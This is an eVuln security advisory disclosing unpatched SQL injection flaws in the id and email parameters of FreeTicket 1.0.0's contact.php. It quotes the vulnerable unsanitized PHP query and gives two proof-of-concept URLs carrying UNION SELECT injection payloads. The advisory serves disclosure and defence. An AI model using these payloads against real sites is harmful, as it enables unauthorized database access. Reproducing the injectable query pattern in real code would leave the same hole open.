FreeTicket version 1.0.0 suffers from remote SQL injection vulnerabilities.
5e354aeaad34e9da3e4fcf4b5c3376d8093f1109014c0610f21c7d46f12b934a
Subject: [eVuln.com] SQL injections in FreeTicket
New eVuln Advisory:
SQL injections in FreeTicket
Summary: http://evuln.com/vulns/146/summary.html
Details: http://evuln.com/vulns/146/description.html
-----------Summary-----------
eVuln ID: EV0146
Software: FreeTicket
Vendor: Mrcgiguy
Version: 1.0.0
Critical Level: medium
Type: SQL injection
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
1. 'id' SQL injection
Vulnerability found in contact.php script.
User-defined variable id is not properly sanitized before being used in SQL query.
This can be used to execute arbitrary SQL query.
2. 'email' SQL injection
Vulnerable script is contact.php script.
'email' parameter is not properly sanitized before being used in SQL query.
--------PoC/Exploit--------
Vulnerable code.
There is no SQL injection filter is used:
$email = $_POST["email"]; $id = $_POST["id"];
if (!$id) {$id = $_GET[id];} if (!$email) {$email = $_GET[email];}
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");
'id' SQL injection example.
The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*
'email' SQL injection example.
PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*
Condition.
magic_quotes_gpc = off
---------Solution----------
Not available
----------Credit-----------
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/xss/bbcode.html - recent XSS in bbcode